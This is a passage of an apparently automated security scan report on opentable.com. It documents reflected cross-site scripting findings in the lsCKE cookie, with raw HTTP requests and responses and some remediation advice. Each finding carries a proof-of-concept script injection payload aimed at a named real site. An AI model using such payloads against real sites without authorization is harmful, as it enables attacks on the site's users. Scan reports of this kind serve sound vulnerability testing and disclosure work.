Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestreff29da"><script>alert(1)</script>aab47995e43/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

3.19. http://www.opentable.com/opentables.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86571"-alert(1)-"6df2532a40d was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1=100&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=9&vbefreg=9&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=9&vbefreg=9&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=9&vbefreg=9&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46311


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<!--
var s_account="otrestref86571"-alert(1)-"6df2532a40d";
//-->
...[SNIP]...

3.20. http://www.opentable.com/opentables.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4b9d"><script>alert(1)</script>274d9f2ce68 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1=100&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46341


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

3.21. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /rest_profile.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f96d"><script>alert(1)</script>5ac8eae4578 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rest_profile.aspx?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a01&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
